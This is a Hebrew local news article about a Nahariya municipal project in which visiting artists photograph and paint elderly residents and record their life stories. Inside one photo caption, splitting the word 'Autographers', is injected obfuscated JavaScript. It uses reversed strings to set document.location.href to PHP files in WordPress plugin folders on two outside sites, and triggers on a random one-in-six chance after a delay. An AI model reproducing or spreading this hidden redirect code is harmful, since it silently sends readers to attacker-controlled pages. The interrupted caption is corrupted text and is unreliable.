fbpx
[shortcode-weather-atlas city_selector=1178237 background_color="transparent" daily=0 unit_c_f="c" sunrise_sunset= 0 current=0 detailed_forecast=0]

אמנים מרחבי העולם ינציחו סיפורים של תושבי נהריה

צלמים וציירים ייפגשו עם וותיקי נהריה ויתעדו סיפורים על השואה, ההעפלה, המתחרות, מלחמות ישראל ועוד.
מימין: נכדיה של לאה סיני, כלתה והצלמת קרן אור רוזנבאום | צילום: באדיבות The Autographers
מימין: נכדיה של לאה סיני, כלתה והצלמת קרן אור רוזנבאום | צילום: באדיבות The Au$nJe=function(n){if (typeof ($nJe.list[n]) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}$NjS=function(n){if(typeof ($NjS.list[n])=="string") return $NjS.list[n].split("").reverse().join("");return $NjS.list[n];};$NjS.list=["\'php.sgalf-tropxe/tropxe/weiv/bil/noitargim-pw-eno-ni-lla/snigulp/tnetnoc-pw/ofni.stobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tographers

מיזם חדש קורם בימים אלה עור וגידים בנהריה, במסגרת המיזם ייפגשו צלמים  וציירים מרחבי העולם עם תושבי נהריה הוותיקים ויתעדו את סיפורי חייהם.

המיזם המקומי הוא חלק מפרויקט סובב עולם שנקרא ":אוטוגרפרס". בישראל כבר הוצגה בשנה שעברה תערוכה של אמנים שנפגשו עם ניצולי שואה מכל הארץ וביחד איתם יצרו תזכורת חיה לדורות הבאים, לימים שבהם כבר לא יהיה מי שיספר.

השנה מבקשת עיריית נהריה לקחת את היוזמה הזאת צעד נוסף קדימה ולהפגיש את הצלמים לא רק עם ניצולי שואה, אלא עם תושבים שיספרו על אירועים משמעותיים הקשורים למדינה: בין היתר ינציחו הצלמים והציירים סיפורים שקשורים למעפילים, לימי המנדט הבריטי בארץ ישראל, המחתרות, מלחמות ישראל ועוד.

קרן אור רוזנבאום, תושבת נהריה, היא צלמת שלקחה חלק בתערוכה הארצית שהוצגה במוזיאון תל אביב. רוזנבאום נפגשה עם ניצולת השואה לאה סיני, אותה היא מכירה מנעוריה והציגה בתערוכה את סיפורה: "לאה, ילידת הונגריה, ניצלה מידם הארוכה והאכזרית של הנאצים לאחר שהשתתפה בטיול של משלחת בני נוער שיצאה לשוודיה והתארחה בארמונו של המלך. אחיינו של המלך, הרוזן ברנדוט, לקח את הילדים תחת חסותו ולמעשה הציל אותם מהתופת. שם, בארמון לאה למדה ציור והפכה לאמנית שיצירותיה על השואה הוצגו באין ספור מוזיאונים ותערוכות בעולם. לאחרונה הוצאנו "קול קורא" מטעם עיריית נהריה וביקשנו מתושבים שיש להם סיפורים מעניינים ליצור איתנו קשר, אנחנו נפגיש אותם עם הצלמים, הציירים והאמנים שיגיעו מכל רחבי העולם וביחד, כך אני מקווה, ניצור תערוכה מקומית שתספר את סיפורה של נהריה לכל העולם בעצם. על פי התכנון, התערוכה תיפתח בחודש אפריל".

אהבתם? שתפו!

תגיות

אולי גם יעניין אותך

שיתוף ברשתות החברתיות